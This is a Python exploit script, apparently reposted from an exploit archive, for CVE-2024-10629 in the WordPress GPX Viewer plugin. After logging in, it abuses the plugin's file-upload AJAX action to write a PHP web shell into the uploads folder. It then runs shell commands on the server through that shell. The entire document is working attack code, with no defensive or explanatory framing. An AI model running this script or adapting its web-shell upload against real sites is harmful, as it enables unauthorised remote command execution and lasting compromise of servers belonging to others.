WordPress GPX Viewer 2.2.8 Arbitrary File Creation Exploit CVE-2024-10629

## https://sploitus.com/exploit?id=1337DAY-ID-39945
import argparse
import requests
from requests.sessions import Session
import time

banner = """
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██████╗  ██████╗ ██████╗  █████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║██╔═████╗██╔════╝ ╚════██╗██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║██║██╔██║███████╗  █████╔╝╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║████╔╝██║██╔═══██╗██╔═══╝  ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║╚██████╔╝╚██████╔╝███████╗ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═════╝  ╚═════╝ ╚══════╝ ╚════╝ 
                        Exploit by : Nxploit \ Khaled alEnazi                                                                                  
"""

print(banner)

def parse_arguments():
    parser = argparse.ArgumentParser(description='Exploit a vulnerability in a WordPress plugin allowing file upload.')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-un', '--username', required=True, help='Username for login')
    parser.add_argument('-p', '--password', required=True, help='Password for login')
    return parser.parse_args()

def create_session():
    session = Session()
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
    session.headers.update({"User-Agent": user_agent})
    return session

def get_wordpress_version(url):
    plugin_readme_url = f'{url}/wp-content/plugins/gpx-viewer/readme.txt'
    response = requests.get(plugin_readme_url, verify=False)
    time.sleep(2)  # Wait for 2 seconds
    if response.status_code == 200:
        for line in response.text.splitlines():
            if line.startswith("Stable tag:"):
                version = line.split(":")[1].strip()
                return version
    return None

def check_version(version):
    vulnerable_version = "2.2.8"
    return version and version <= vulnerable_version

def login(session, url, username, password):
    login_url = f'{url}/wp-login.php'
    response = session.post(login_url, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }, verify=False)
    time.sleep(2)  # Wait for 2 seconds
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)

def upload_payload(session, url):
    upload_url = f'{url}/wp-admin/admin-ajax.php'
    payload = '''<?php  
if(isset($_GET['cmd'])) {  
    system($_GET['cmd']);  
}  
?>'''
    boundary = '---------------------------267455711524671334248015039'
    body = f"""
--{boundary}
Content-Disposition: form-data; name="action"

gpxv_file_upload
--{boundary}
Content-Disposition: form-data; name="category"

uncategorized
--{boundary}
Content-Disposition: form-data; name="filename"

nxploit_exploit.php
--{boundary}
Content-Disposition: form-data; name="gpx"

{payload}
--{boundary}--
"""
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
    }
    response = session.post(upload_url, data=body, headers=headers)
    time.sleep(2)  # Wait for 2 seconds
    return response.status_code == 200

def check_shell(session, url):
    shell_url = f'{url}/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php'
    response = session.get(shell_url, verify=False)
    time.sleep(2)  # Wait for 2 seconds
    if response.status_code == 200:
        print("[+] Shell uploaded successfully.")
        print(f"[+] Shell URL: {shell_url}")
        return shell_url
    print("[-] Shell upload failed.")
    return None

def execute_command(session, shell_url, cmd):
    response = session.get(f'{shell_url}?cmd={cmd}', verify=False)
    print(f"[+] Command output:\n{shell_url}?cmd={cmd}\n{response.text}")
    print("\nExample commands:\nls = show files\nuname -a = show system information\n")

def main():
    args = parse_arguments()
    session = create_session()
    
    version = get_wordpress_version(args.url)
    if version:
        print(f"[+] WordPress plugin version: {version}")
        if check_version(version):
            print("[+] Vulnerable version detected. Proceeding with exploitation...")
        else:
            print("[-] Version not vulnerable. Exiting.")
            return
    else:
        print("[-] Could not determine plugin version. Exiting.")
        return
    
    if login(session, args.url, args.username, args.password):
        print("[+] Logged in successfully.")
        if upload_payload(session, args.url):
            print("[+] Shell uploaded. Checking shell...")
            shell_url = check_shell(session, args.url)
            if shell_url:
                execute_command(session, shell_url, "ls")
        else:
            print("[-] Failed to upload shell.")
    else:
        print("[-] Failed to log in.")

if __name__ == "__main__":
    main()